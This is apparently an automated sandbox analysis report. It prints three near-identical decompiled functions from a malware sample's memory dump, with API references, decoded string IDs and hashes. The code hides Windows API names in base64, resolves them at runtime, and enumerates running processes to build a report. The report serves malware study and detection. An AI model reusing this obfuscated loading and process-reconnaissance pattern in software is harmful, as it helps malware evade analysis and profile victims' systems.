				intOrPtr _t247;

				_t238 = __esi;
				_t245 = _t246;
				_t247 = _t246 + 0xfffffda0;
				_v612 = 0;
				_v608 = 0;
				_v604 = 0;
				_v596 = 0;
				_v600 = 0;
				_v592 = 0;
				_v588 = 0;
				_v8 = 0;
				_v24 = 0;
				_v16 = __eax;
				 *[fs:eax] = _t247;
				E00406984("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
				_t113 = E00403990(_v588);
				_t192 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t113);
				E00406984("UHJvY2VzczMyRmlyc3RX", _t192,  &_v592, __edi, __esi);
				_t119 = E00403990(_v592);
				_t235 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t119);
				E00406984("UHJvY2VzczMyTmV4dFc=", _t192,  &_v596, _t235, __esi);
				_t125 = E00403990(_v596);
				E00406984("a2VybmVsMzIuZGxs", _t192,  &_v600, _t235, _t238);
				_t239 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t125);
				E004034E4(_v16);
				_t193 =  *_t192(2, 0,  *[fs:eax], 0x416eca, _t246, __edi, __esi, __ebx, _t244);
				if(_t193 != 0xffffffff) {
					_v584 = 0x22c;
					_push( &_v584);
					_push(_t193);
					if( *_t235() != 0) {
						do {
							_push(E004045EC(_v8) + 1);
							E004047A8();
							_t183 = E004045EC(_v8);
							_t243 =  &_v584;
							memcpy(_v8 + _t183 * 0x8b * 4 - 0x22c, _t243, 0x8b << 2);
							_t247 = _t247 + 0x10;
							_t235 = _t243 + 0x116;
							_t239 = _t239;
							 *((intOrPtr*)(_v8 + E004045EC(_v8) * 0x8b * 4 - 0x20c)) = 0;
							_push( &_v584);
							_push(_t193);
						} while ( *_t239() != 0);
					}
					_t174 =  *0x41b57c; // 0x41c690
					 *((intOrPtr*)( *_t174))(_t193);
				}
				_t137 = E004045EC(_v8) - 1;
				if(_t137 >= 0) {
					_v28 = _t137 + 1;
					_t195 = 0;
					do {
						_v17 = 1;
						_t169 = E004045EC(_v8) - 1;
						if(_t169 >= 0) {
							_t171 = _t169 + 1;
							_t229 = 0;
							do {
								_t43 = _t195 * 0x8b * 4; // 0x0
								_t242 = _t229 * 0x8b;
								_t235 = _v8;
								_t47 = _t242 * 4; // 0x1ffff
								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
									_v17 = 0;
								}
								_t229 = _t229 + 1;
								_t171 = _t171 - 1;
							} while (_t171 != 0);
						}
						_t170 = _t195 * 0x8b;
						_t52 = _t170 * 4; // 0x0
						_t56 = _t170 * 4; // 0x1ffff
						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
							_v17 = 1;
						}
						if(_v17 == 1) {
							 *((intOrPtr*)(_v8 + 0x20 + _t170 * 4)) = 1;
						}
						_t195 = _t195 + 1;
						_t64 =  &_v28;
						 *_t64 = _v28 - 1;
					} while ( *_t64 != 0);
				}
				_v12 = GetCurrentProcessId();
				_t141 = E004045EC(_v8) - 1;
				if(_t141 >= 0) {
					_v28 = _t141 + 1;
					_t194 = 0;
					do {
						_t240 = _t194 * 0x8b;
						if( *((intOrPtr*)(_v8 + 0x20 + _t240 * 4)) == 1) {
							_t75 = _t240 * 4; // 0x1ffff
							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
								_push(_v24);
								_t90 = _t240 * 4; // 0x0
								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
								_push(_v608);
								_push(E00416F84);
								E00403850();
							} else {
								_push(_v24);
								_t82 = _t240 * 4; // 0x0
								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
								_push(_v604);
								_push(0x416f78);
								_push(E00416F84);
								E00403850();
							}
							_t96 = _t194 * 0x8b * 4; // 0x1ffff
							E004169F0( *((intOrPtr*)(_v8 + _t96 + 8)), _t194,  &_v612, 1, _t235, _t240, _t245);
							E00403798( &_v24, _v612);
						}
						E00403538(_v16, _v24);
						_t194 = _t194 + 1;
						_t103 =  &_v28;
						 *_t103 = _v28 - 1;
					} while ( *_t103 != 0);
				}
				_pop(_t214);
				 *[fs:eax] = _t214;
				_push(E00416ED1);
				E00403508( &_v612, 7);
				E004034E4( &_v24);
				_t216 =  *0x4169c8; // 0x4169cc
				return E004047B4( &_v8, _t216);
			}









































                                                                      0x00416b94
                                                                      0x00416b95
                                                                      0x00416b97
                                                                      0x00416ba2
                                                                      0x00416ba8
                                                                      0x00416bae
                                                                      0x00416bb4
                                                                      0x00416bba
                                                                      0x00416bc0
                                                                      0x00416bc6
                                                                      0x00416bcc
                                                                      0x00416bcf
                                                                      0x00416bd2
                                                                      0x00416be0
                                                                      0x00416bee
                                                                      0x00416bf9
                                                                      0x00416c0f
                                                                      0x00416c1c
                                                                      0x00416c27
                                                                      0x00416c3d
                                                                      0x00416c4a
                                                                      0x00416c55
                                                                      0x00416c66
                                                                      0x00416c82
                                                                      0x00416c87
                                                                      0x00416c92
                                                                      0x00416c97
                                                                      0x00416c9d
                                                                      0x00416cad
                                                                      0x00416cae
                                                                      0x00416cb3
                                                                      0x00416cb5
                                                                      0x00416cbe
                                                                      0x00416ccd
                                                                      0x00416cd8
                                                                      0x00416cee
                                                                      0x00416cf9
                                                                      0x00416cf9
                                                                      0x00416cf9
                                                                      0x00416cfb
                                                                      0x00416d0f
                                                                      0x00416d1c
                                                                      0x00416d1d
                                                                      0x00416d20
                                                                      0x00416cb5
                                                                      0x00416d25
                                                                      0x00416d2c
                                                                      0x00416d2c
                                                                      0x00416d36
                                                                      0x00416d39
                                                                      0x00416d3c
                                                                      0x00416d3f
                                                                      0x00416d41
                                                                      0x00416d41
                                                                      0x00416d4d
                                                                      0x00416d50
                                                                      0x00416d52
                                                                      0x00416d53
                                                                      0x00416d55
                                                                      0x00416d5e
                                                                      0x00416d62
                                                                      0x00416d68
                                                                      0x00416d6b
                                                                      0x00416d6f
                                                                      0x00416d71
                                                                      0x00416d71
                                                                      0x00416d75
                                                                      0x00416d76
                                                                      0x00416d76
                                                                      0x00416d55
                                                                      0x00416d79
                                                                      0x00416d82
                                                                      0x00416d89
                                                                      0x00416d8d
                                                                      0x00416d8f
                                                                      0x00416d8f
                                                                      0x00416d97
                                                                      0x00416d9c
                                                                      0x00416d9c
                                                                      0x00416da4
                                                                      0x00416da5
                                                                      0x00416da5
                                                                      0x00416da5
                                                                      0x00416d41
                                                                      0x00416daf
                                                                      0x00416dba
                                                                      0x00416dbd
                                                                      0x00416dc4
                                                                      0x00416dc7
                                                                      0x00416dc9
                                                                      0x00416dc9
                                                                      0x00416dd7
                                                                      0x00416de0
                                                                      0x00416de7
                                                                      0x00416e22
                                                                      0x00416e2e
                                                                      0x00416e37
                                                                      0x00416e3c
                                                                      0x00416e42
                                                                      0x00416e4f
                                                                      0x00416de9
                                                                      0x00416de9
                                                                      0x00416df5
                                                                      0x00416dfe
                                                                      0x00416e03
                                                                      0x00416e09
                                                                      0x00416e0e
                                                                      0x00416e1b
                                                                      0x00416e1b
                                                                      0x00416e5e
                                                                      0x00416e6d
                                                                      0x00416e7c
                                                                      0x00416e7c
                                                                      0x00416e87
                                                                      0x00416e8c
                                                                      0x00416e8d
                                                                      0x00416e8d
                                                                      0x00416e8d
                                                                      0x00416dc9
                                                                      0x00416e98
                                                                      0x00416e9b
                                                                      0x00416e9e
                                                                      0x00416eae
                                                                      0x00416eb6
                                                                      0x00416ebe
                                                                      0x00416ec9

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                      • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc$CurrentProcess
                                                                      • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                                                                      • API String ID: 3877065590-4127804628
                                                                      • Opcode ID: 9a370d218ba479bacba9924df52720c8bc51f1f8e8ad6289ec54fa435578b534
                                                                      • Instruction ID: b4fa090e97bfe7a1d5ce5cc441e323bfe92997b970e5e29befa82c83258fdf6c
                                                                      • Opcode Fuzzy Hash: 9a370d218ba479bacba9924df52720c8bc51f1f8e8ad6289ec54fa435578b534
                                                                      • Instruction Fuzzy Hash: B4918574A001099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00416B8C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 216libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 71%
                                                                      			E00416B8C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				long _v12;
				signed int _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				signed int _t109;
				signed int _t110;
				CHAR* _t115;
				CHAR* _t121;
				CHAR* _t127;
				void* _t139;
				void* _t143;
				void* _t171;
				signed int _t172;
				void* _t173;
				intOrPtr* _t176;
				signed int _t185;
				intOrPtr* _t194;
				void* _t195;
				signed int _t196;
				signed int _t197;
				intOrPtr _t216;
				intOrPtr _t218;
				signed int _t231;
				intOrPtr* _t241;
				signed int _t242;
				signed int _t244;
				void* _t245;
				void* _t246;
				void* _t248;
				intOrPtr _t249;

				_t240 = __esi;
				_t109 = __eax +  *__eax;
				 *_t109 =  *_t109 + _t109;
				_t110 = _t109 | 0x5500000a;
				_t247 = _t248;
				_t249 = _t248 + 0xfffffda0;
				_v612 = 0;
				_v608 = 0;
				_v604 = 0;
				_v596 = 0;
				_v600 = 0;
				_v592 = 0;
				_v588 = 0;
				_v8 = 0;
				_v24 = 0;
				_v16 = _t110;
				 *[fs:eax] = _t249;
				E00406984("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
				_t115 = E00403990(_v588);
				_t194 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t115);
				E00406984("UHJvY2VzczMyRmlyc3RX", _t194,  &_v592, __edi, __esi);
				_t121 = E00403990(_v592);
				_t237 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t121);
				E00406984("UHJvY2VzczMyTmV4dFc=", _t194,  &_v596, _t237, __esi);
				_t127 = E00403990(_v596);
				E00406984("a2VybmVsMzIuZGxs", _t194,  &_v600, _t237, _t240);
				_t241 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t127);
				E004034E4(_v16);
				_t195 =  *_t194(2, 0,  *[fs:eax], 0x416eca, _t248, __edi, __esi, __ebx, _t246);
				if(_t195 != 0xffffffff) {
					_v584 = 0x22c;
					_push( &_v584);
					_push(_t195);
					if( *_t237() != 0) {
						do {
							_push(E004045EC(_v8) + 1);
							E004047A8();
							_t185 = E004045EC(_v8);
							_t245 =  &_v584;
							memcpy(_v8 + _t185 * 0x8b * 4 - 0x22c, _t245, 0x8b << 2);
							_t249 = _t249 + 0x10;
							_t237 = _t245 + 0x116;
							_t241 = _t241;
							 *((intOrPtr*)(_v8 + E004045EC(_v8) * 0x8b * 4 - 0x20c)) = 0;
							_push( &_v584);
							_push(_t195);
						} while ( *_t241() != 0);
					}
					_t176 =  *0x41b57c; // 0x41c690
					 *((intOrPtr*)( *_t176))(_t195);
				}
				_t139 = E004045EC(_v8) - 1;
				if(_t139 >= 0) {
					_v28 = _t139 + 1;
					_t197 = 0;
					do {
						_v17 = 1;
						_t171 = E004045EC(_v8) - 1;
						if(_t171 >= 0) {
							_t173 = _t171 + 1;
							_t231 = 0;
							do {
								_t43 = _t197 * 0x8b * 4; // 0x0
								_t244 = _t231 * 0x8b;
								_t237 = _v8;
								_t47 = _t244 * 4; // 0x1ffff
								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
									_v17 = 0;
								}
								_t231 = _t231 + 1;
								_t173 = _t173 - 1;
							} while (_t173 != 0);
						}
						_t172 = _t197 * 0x8b;
						_t52 = _t172 * 4; // 0x0
						_t56 = _t172 * 4; // 0x1ffff
						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
							_v17 = 1;
						}
						if(_v17 == 1) {
							 *((intOrPtr*)(_v8 + 0x20 + _t172 * 4)) = 1;
						}
						_t197 = _t197 + 1;
						_t64 =  &_v28;
						 *_t64 = _v28 - 1;
					} while ( *_t64 != 0);
				}
				_v12 = GetCurrentProcessId();
				_t143 = E004045EC(_v8) - 1;
				if(_t143 >= 0) {
					_v28 = _t143 + 1;
					_t196 = 0;
					do {
						_t242 = _t196 * 0x8b;
						if( *((intOrPtr*)(_v8 + 0x20 + _t242 * 4)) == 1) {
							_t75 = _t242 * 4; // 0x1ffff
							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
								_push(_v24);
								_t90 = _t242 * 4; // 0x0
								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
								_push(_v608);
								_push(E00416F84);
								E00403850();
							} else {
								_push(_v24);
								_t82 = _t242 * 4; // 0x0
								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
								_push(_v604);
								_push(0x416f78);
								_push(E00416F84);
								E00403850();
							}
							_t96 = _t196 * 0x8b * 4; // 0x1ffff
							E004169F0( *((intOrPtr*)(_v8 + _t96 + 8)), _t196,  &_v612, 1, _t237, _t242, _t247);
							E00403798( &_v24, _v612);
						}
						E00403538(_v16, _v24);
						_t196 = _t196 + 1;
						_t103 =  &_v28;
						 *_t103 = _v28 - 1;
					} while ( *_t103 != 0);
				}
				_pop(_t216);
				 *[fs:eax] = _t216;
				_push(E00416ED1);
				E00403508( &_v612, 7);
				E004034E4( &_v24);
				_t218 =  *0x4169c8; // 0x4169cc
				return E004047B4( &_v8, _t218);
			}











































                                                                      0x00416b8c
                                                                      0x00416b8c
                                                                      0x00416b8e
                                                                      0x00416b90
                                                                      0x00416b95
                                                                      0x00416b97
                                                                      0x00416ba2
                                                                      0x00416ba8
                                                                      0x00416bae
                                                                      0x00416bb4
                                                                      0x00416bba
                                                                      0x00416bc0
                                                                      0x00416bc6
                                                                      0x00416bcc
                                                                      0x00416bcf
                                                                      0x00416bd2
                                                                      0x00416be0
                                                                      0x00416bee
                                                                      0x00416bf9
                                                                      0x00416c0f
                                                                      0x00416c1c
                                                                      0x00416c27
                                                                      0x00416c3d
                                                                      0x00416c4a
                                                                      0x00416c55
                                                                      0x00416c66
                                                                      0x00416c82
                                                                      0x00416c87
                                                                      0x00416c92
                                                                      0x00416c97
                                                                      0x00416c9d
                                                                      0x00416cad
                                                                      0x00416cae
                                                                      0x00416cb3
                                                                      0x00416cb5
                                                                      0x00416cbe
                                                                      0x00416ccd
                                                                      0x00416cd8
                                                                      0x00416cee
                                                                      0x00416cf9
                                                                      0x00416cf9
                                                                      0x00416cf9
                                                                      0x00416cfb
                                                                      0x00416d0f
                                                                      0x00416d1c
                                                                      0x00416d1d
                                                                      0x00416d20
                                                                      0x00416cb5
                                                                      0x00416d25
                                                                      0x00416d2c
                                                                      0x00416d2c
                                                                      0x00416d36
                                                                      0x00416d39
                                                                      0x00416d3c
                                                                      0x00416d3f
                                                                      0x00416d41
                                                                      0x00416d41
                                                                      0x00416d4d
                                                                      0x00416d50
                                                                      0x00416d52
                                                                      0x00416d53
                                                                      0x00416d55
                                                                      0x00416d5e
                                                                      0x00416d62
                                                                      0x00416d68
                                                                      0x00416d6b
                                                                      0x00416d6f
                                                                      0x00416d71
                                                                      0x00416d71
                                                                      0x00416d75
                                                                      0x00416d76
                                                                      0x00416d76
                                                                      0x00416d55
                                                                      0x00416d79
                                                                      0x00416d82
                                                                      0x00416d89
                                                                      0x00416d8d
                                                                      0x00416d8f
                                                                      0x00416d8f
                                                                      0x00416d97
                                                                      0x00416d9c
                                                                      0x00416d9c
                                                                      0x00416da4
                                                                      0x00416da5
                                                                      0x00416da5
                                                                      0x00416da5
                                                                      0x00416d41
                                                                      0x00416daf
                                                                      0x00416dba
                                                                      0x00416dbd
                                                                      0x00416dc4
                                                                      0x00416dc7
                                                                      0x00416dc9
                                                                      0x00416dc9
                                                                      0x00416dd7
                                                                      0x00416de0
                                                                      0x00416de7
                                                                      0x00416e22
                                                                      0x00416e2e
                                                                      0x00416e37
                                                                      0x00416e3c
                                                                      0x00416e42
                                                                      0x00416e4f
                                                                      0x00416de9
                                                                      0x00416de9
                                                                      0x00416df5
                                                                      0x00416dfe
                                                                      0x00416e03
                                                                      0x00416e09
                                                                      0x00416e0e
                                                                      0x00416e1b
                                                                      0x00416e1b
                                                                      0x00416e5e
                                                                      0x00416e6d
                                                                      0x00416e7c
                                                                      0x00416e7c
                                                                      0x00416e87
                                                                      0x00416e8c
                                                                      0x00416e8d
                                                                      0x00416e8d
                                                                      0x00416e8d
                                                                      0x00416dc9
                                                                      0x00416e98
                                                                      0x00416e9b
                                                                      0x00416e9e
                                                                      0x00416eae
                                                                      0x00416eb6
                                                                      0x00416ebe
                                                                      0x00416ec9

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                      • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc$CurrentProcess
                                                                      • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                                                                      • API String ID: 3877065590-4127804628
                                                                      • Opcode ID: 65300b4e60da800d415c1a3cb2551db00b88653df35aa2bd350cfea82b7b47e0
                                                                      • Instruction ID: f3c24ddc2a443a78fd4165323e7ca93df30f075cb4f00a4e444516d0c24f858d
                                                                      • Opcode Fuzzy Hash: 65300b4e60da800d415c1a3cb2551db00b88653df35aa2bd350cfea82b7b47e0
                                                                      • Instruction Fuzzy Hash: FB917570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00416B90 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 214libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 71%
                                                                      			E00416B90(signed int __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				long _v12;
				signed int _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				signed int _t109;
				CHAR* _t114;
				CHAR* _t120;
				CHAR* _t126;
				void* _t138;
				void* _t142;
				void* _t170;
				signed int _t171;
				void* _t172;
				intOrPtr* _t175;
				signed int _t184;
				intOrPtr* _t193;
				void* _t194;
				signed int _t195;
				signed int _t196;
				intOrPtr _t215;
				intOrPtr _t217;
				signed int _t230;
				intOrPtr* _t240;
				signed int _t241;
				signed int _t243;
				void* _t244;
				void* _t245;
				void* _t247;
				intOrPtr _t248;

				_t239 = __esi;
				_t109 = __eax | 0x5500000a;
				_t246 = _t247;
				_t248 = _t247 + 0xfffffda0;
				_v612 = 0;
				_v608 = 0;
				_v604 = 0;
				_v596 = 0;
				_v600 = 0;
				_v592 = 0;
				_v588 = 0;
				_v8 = 0;
				_v24 = 0;
				_v16 = _t109;
				 *[fs:eax] = _t248;
				E00406984("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
				_t114 = E00403990(_v588);
				_t193 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t114);
				E00406984("UHJvY2VzczMyRmlyc3RX", _t193,  &_v592, __edi, __esi);
				_t120 = E00403990(_v592);
				_t236 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t120);
				E00406984("UHJvY2VzczMyTmV4dFc=", _t193,  &_v596, _t236, __esi);
				_t126 = E00403990(_v596);
				E00406984("a2VybmVsMzIuZGxs", _t193,  &_v600, _t236, _t239);
				_t240 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t126);
				E004034E4(_v16);
				_t194 =  *_t193(2, 0,  *[fs:eax], 0x416eca, _t247, __edi, __esi, __ebx, _t245);
				if(_t194 != 0xffffffff) {
					_v584 = 0x22c;
					_push( &_v584);
					_push(_t194);
					if( *_t236() != 0) {
						do {
							_push(E004045EC(_v8) + 1);
							E004047A8();
							_t184 = E004045EC(_v8);
							_t244 =  &_v584;
							memcpy(_v8 + _t184 * 0x8b * 4 - 0x22c, _t244, 0x8b << 2);
							_t248 = _t248 + 0x10;
							_t236 = _t244 + 0x116;
							_t240 = _t240;
							 *((intOrPtr*)(_v8 + E004045EC(_v8) * 0x8b * 4 - 0x20c)) = 0;
							_push( &_v584);
							_push(_t194);
						} while ( *_t240() != 0);
					}
					_t175 =  *0x41b57c; // 0x41c690
					 *((intOrPtr*)( *_t175))(_t194);
				}
				_t138 = E004045EC(_v8) - 1;
				if(_t138 >= 0) {
					_v28 = _t138 + 1;
					_t196 = 0;
					do {
						_v17 = 1;
						_t170 = E004045EC(_v8) - 1;
						if(_t170 >= 0) {
							_t172 = _t170 + 1;
							_t230 = 0;
							do {
								_t43 = _t196 * 0x8b * 4; // 0x0
								_t243 = _t230 * 0x8b;
								_t236 = _v8;
								_t47 = _t243 * 4; // 0x1ffff
								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
									_v17 = 0;
								}
								_t230 = _t230 + 1;
								_t172 = _t172 - 1;
							} while (_t172 != 0);
						}
						_t171 = _t196 * 0x8b;
						_t52 = _t171 * 4; // 0x0
						_t56 = _t171 * 4; // 0x1ffff
						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
							_v17 = 1;
						}
						if(_v17 == 1) {
							 *((intOrPtr*)(_v8 + 0x20 + _t171 * 4)) = 1;
						}
						_t196 = _t196 + 1;
						_t64 =  &_v28;
						 *_t64 = _v28 - 1;
					} while ( *_t64 != 0);
				}
				_v12 = GetCurrentProcessId();
				_t142 = E004045EC(_v8) - 1;
				if(_t142 >= 0) {
					_v28 = _t142 + 1;
					_t195 = 0;
					do {
						_t241 = _t195 * 0x8b;
						if( *((intOrPtr*)(_v8 + 0x20 + _t241 * 4)) == 1) {
							_t75 = _t241 * 4; // 0x1ffff
							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
								_push(_v24);
								_t90 = _t241 * 4; // 0x0
								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
								_push(_v608);
								_push(E00416F84);
								E00403850();
							} else {
								_push(_v24);
								_t82 = _t241 * 4; // 0x0
								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
								_push(_v604);
								_push(0x416f78);
								_push(E00416F84);
								E00403850();
							}
							_t96 = _t195 * 0x8b * 4; // 0x1ffff
							E004169F0( *((intOrPtr*)(_v8 + _t96 + 8)), _t195,  &_v612, 1, _t236, _t241, _t246);
							E00403798( &_v24, _v612);
						}
						E00403538(_v16, _v24);
						_t195 = _t195 + 1;
						_t103 =  &_v28;
						 *_t103 = _v28 - 1;
					} while ( *_t103 != 0);
				}
				_pop(_t215);
				 *[fs:eax] = _t215;
				_push(E00416ED1);
				E00403508( &_v612, 7);
				E004034E4( &_v24);
				_t217 =  *0x4169c8; // 0x4169cc
				return E004047B4( &_v8, _t217);
			}










































                                                                      0x00416b90
                                                                      0x00416b90
                                                                      0x00416b95
                                                                      0x00416b97
                                                                      0x00416ba2
                                                                      0x00416ba8
                                                                      0x00416bae
                                                                      0x00416bb4
                                                                      0x00416bba
                                                                      0x00416bc0
                                                                      0x00416bc6
                                                                      0x00416bcc
                                                                      0x00416bcf
                                                                      0x00416bd2
                                                                      0x00416be0
                                                                      0x00416bee
                                                                      0x00416bf9
                                                                      0x00416c0f
                                                                      0x00416c1c
                                                                      0x00416c27
                                                                      0x00416c3d
                                                                      0x00416c4a
                                                                      0x00416c55
                                                                      0x00416c66
                                                                      0x00416c82
                                                                      0x00416c87
                                                                      0x00416c92
                                                                      0x00416c97
                                                                      0x00416c9d
                                                                      0x00416cad
                                                                      0x00416cae
                                                                      0x00416cb3
                                                                      0x00416cb5
                                                                      0x00416cbe
                                                                      0x00416ccd
                                                                      0x00416cd8
                                                                      0x00416cee
                                                                      0x00416cf9
                                                                      0x00416cf9
                                                                      0x00416cf9
                                                                      0x00416cfb
                                                                      0x00416d0f
                                                                      0x00416d1c
                                                                      0x00416d1d
                                                                      0x00416d20
                                                                      0x00416cb5
                                                                      0x00416d25
                                                                      0x00416d2c
                                                                      0x00416d2c
                                                                      0x00416d36
                                                                      0x00416d39
                                                                      0x00416d3c
                                                                      0x00416d3f
                                                                      0x00416d41
                                                                      0x00416d41
                                                                      0x00416d4d
                                                                      0x00416d50
                                                                      0x00416d52
                                                                      0x00416d53
                                                                      0x00416d55
                                                                      0x00416d5e
                                                                      0x00416d62
                                                                      0x00416d68
                                                                      0x00416d6b
                                                                      0x00416d6f
                                                                      0x00416d71
                                                                      0x00416d71
                                                                      0x00416d75
                                                                      0x00416d76
                                                                      0x00416d76
                                                                      0x00416d55
                                                                      0x00416d79
                                                                      0x00416d82
                                                                      0x00416d89
                                                                      0x00416d8d
                                                                      0x00416d8f
                                                                      0x00416d8f
                                                                      0x00416d97
                                                                      0x00416d9c
                                                                      0x00416d9c
                                                                      0x00416da4
                                                                      0x00416da5
                                                                      0x00416da5
                                                                      0x00416da5
                                                                      0x00416d41
                                                                      0x00416daf
                                                                      0x00416dba
                                                                      0x00416dbd
                                                                      0x00416dc4
                                                                      0x00416dc7
                                                                      0x00416dc9
                                                                      0x00416dc9
                                                                      0x00416dd7
                                                                      0x00416de0
                                                                      0x00416de7
                                                                      0x00416e22
                                                                      0x00416e2e
                                                                      0x00416e37
                                                                      0x00416e3c
                                                                      0x00416e42
                                                                      0x00416e4f
                                                                      0x00416de9
                                                                      0x00416de9
                                                                      0x00416df5
                                                                      0x00416dfe
                                                                      0x00416e03
                                                                      0x00416e09
                                                                      0x00416e0e
                                                                      0x00416e1b
                                                                      0x00416e1b
                                                                      0x00416e5e
                                                                      0x00416e6d
                                                                      0x00416e7c
                                                                      0x00416e7c
                                                                      0x00416e87
                                                                      0x00416e8c
                                                                      0x00416e8d
                                                                      0x00416e8d
                                                                      0x00416e8d
                                                                      0x00416dc9
                                                                      0x00416e98
                                                                      0x00416e9b
                                                                      0x00416e9e
                                                                      0x00416eae
                                                                      0x00416eb6
                                                                      0x00416ebe
                                                                      0x00416ec9

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
